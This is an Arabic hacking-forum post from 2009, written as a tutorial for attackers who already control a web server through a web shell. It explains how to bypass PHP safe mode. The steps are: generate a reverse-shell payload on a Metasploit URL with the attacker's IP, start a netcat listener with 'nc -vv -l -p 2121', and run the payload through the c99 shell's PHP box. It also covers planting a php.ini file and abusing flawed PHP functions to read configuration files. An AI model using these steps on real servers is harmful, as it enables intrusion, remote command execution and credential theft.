عرض مشاركة واحدة
قديم 01-27-2009, 01:00 AM   رقم المشاركة : 10 (permalink)
معلومات العضو
AZOZ
.:: شخصيات هامة ـ::.
 
الصورة الرمزية AZOZ
 

 

 
إحصائية العضو






AZOZ غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
AZOZ is on a distinguished road

افتراضي



#############################
الوضـع الآمــن Safe Mode ..
#############################
الوضع الامن : هي حآلـه السيرفر ..
في حآلـه الـ ON: لايمكـنـك تطبيق الاوامر ولا الاتصال بالسيرفر عن طريق النت كات ولا اخذ روت .. بمعنى اخر لايمكنك فعل شي بالسيرفر
في حآلـه الـ OFF : الي في راسـك سوٍهـ .. لا يوجـد شي يمنعـك .. ^_^
تهقون لمـآ يكون الحآلـه ON نترك الشـل ونرـوٍح .. لآ يوجـد عدة طرق لتخطـي الـ Safe Mode
كل فتره تنزل .. ثغره وطريقه لتخطي الـ Safe mode
وبشرح لكـم كم طريقه تجدونهآ في المرفقآت
الطريقه الاولى : ثغره في كل اصدارات PHP 4 تسمح لك بتخطي السيف مود وتطبيق الاوامر
الطريقه الثانيه : قرائه الملفآت عن طريق ثغرات الي بالسيرفر .. زي ثغره copy() & ini_restore() .. الخ بشـل Sniper_Sa
الطريقـه الثآلثـه : اقفال السيف مود عن طريق زرع ملف php.ini
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
ثغره في كل اصدارات PHP 4 تسمح لك بتخطي السيف مود وتطبيق الاوامر
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
هناك طريقتين للاستغلال من خلال الشل c99 او من خلال رفع ملف PHP على اي موقع
نشرح الثغره من خلال c99
بسم الله نبـدأ :
أول شـي نروح لهـآلموقـع :
http://metasploit.com:55555/PAYLOADS?MODE=SELECT&MODULE=%6c%69%6e%75%78%5f%69% 61%33%32%5f%72%65%76%65%72%73%65
ثمـن تضـع الـ ip تبعـك
والـ portالي تبي تتنصت عليه من النت كـآت
زي الي في الصوره





ثمـ(ن) تضغط علـى
Generate payload





ثمـ(ن) تنسخ المقطع الثاني من الصفحه حتى آخر فاصله الي قبل الاخيـر
زي الي في الصوره





وتضعه في الملف الي في المرفقات
bypass-safemode
مثل الي في الصوره





ثمـن تروح للنت كات وتتنصت على البورت الي حطيته
nc -vv -l -p 2121





ثمـ(ن) تروح للشـيل c99
لخـآصيـه PHP CODE


وتلصـق الكود الي نسخته في المربع
وتضغط على
Execute
مثل الي في الصوره






ثمن تروح للنت كات تلقى نفسك متصل بالسيرفر وتخطيت السيف مود

!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
اقفال السيف مود عن طريق زرع ملف php.ini
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
مابي اقرقر كثيـر .. ^_^ شوفو الصوـره





بس سـوٍ إنشـآء .. بعديـن سوٍ تحديـث للصفحـه .. ويطلعلكـ السيف مود غير فعآل ..
ملاحظه : هذاكلـه في شـل sniper_sa 2
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
قرائه الملفآت عن طريق ثغرات الي بالسيرفر .. زي ثغره copy() & ini_restore() .. الخ بشـل Sniper_Sa
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
الحين معنا شل والسيف مود on وسطر الاوامر مختفـي .. لحمآيـه السيرفر
بسيطـه .. اكتشفت ثغرات في الدوال زي داله الـ system الي شغلتها تنفيذ الاوامر في السيرفر
وعن طريق هذه الثغره يمكننا .. تنفيذ الاوامر ويوجد ايضاً دوال مصابه اخرى في شل السنايبر 2
انظرو الصورة واظن كل شي وأضـح اختر الداله المصابه ونفذ الامر ..





وايضاً يمكنك قرائه الملفات عن طريق دوال اخرى مصابه ..
ناظرو الصورة ..





الحين انتهينا من الدوال
بقـي ثغرات برنامج الـphp
االحيـن نبي نقرا ملف الكونفـق .. ومـآنقـدر ننفذ امر قرائه هذا الملف اصلـن بالمره سطر الاوامر لايوجد
كييييف
انا اقولكـم .. يوجد ثغرات اكتشفت في برنامج الـphp حق السيرفر .. ومنها نقدر نستعرض اي ملف ..
ناظرو الصوره وبتفهمون .. ^_^





جرب لكل ثغره اذا مانفع معك جرب الثانيه .. ويوجد ثغرات اخرى برضوه في الشل
ملاحظه : هذاكلـه في شـل sniper_sa 2
#################################################
التوقيع

مازلت لا أفقهى شي ................

http://www.7ammil.com/data/visitors/...836[1].jpg

Mr.AZOZ
Email:hk-r@live.com

 

   

رد مع اقتباس